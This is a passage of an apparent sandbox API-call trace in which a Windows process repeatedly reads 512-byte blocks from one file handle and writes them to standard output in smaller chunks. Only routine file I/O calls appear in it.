(_FileHandle=1) returned 0x4c [0142.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.560] GetFileType (hFile=0x4c) returned 0x1 [0142.560] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.560] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.560] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.561] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 
[0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] GetFileType (hFile=0x4c) returned 0x1 [0142.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.562] GetFileType (hFile=0x4c) returned 0x1 [0142.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.562] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.563] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.565] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, 
lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.565] GetFileType (hFile=0x4c) returned 0x1 [0142.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.565] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] GetFileType (hFile=0x4c) returned 0x1 [0142.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.566] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.567] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.567] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType 
(hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.567] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.568] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.568] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] GetFileType (hFile=0x4c) returned 0x1 [0142.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.568] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, 
lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.569] GetFileType (hFile=0x4c) returned 0x1 [0142.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.570] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.570] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] GetFileType (hFile=0x4c) returned 0x1 [0142.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.570] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] GetFileType (hFile=0x4c) returned 0x1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] WriteFile (in: 
hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] GetFileType (hFile=0x4c) returned 0x1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] GetFileType (hFile=0x4c) returned 0x1 [0142.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.571] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.571] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.571] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] GetFileType (hFile=0x4c) returned 0x1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] GetFileType (hFile=0x4c) returned 0x1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.574] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0142.574] GetFileType (hFile=0x4c) returned 0x1 [0142.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.574] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf258*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf348*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf348*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0142.575] GetFileType (hFile=0x4c) returned 0x1 [0142.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.575] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf398*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf398*, lpNumberOfBytesWritten=0x2ce39c*=0x20, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce388 | out: lpNewFilePointer=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.576] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesRead=0x2ce3a8*=0x200, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2cf208*, lpNumberOfBytesWritten=0x2ce39c*=0x50, lpOverlapped=0x0) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] GetFileType (hFile=0x4c) returned 0x1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.576] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce39c, 
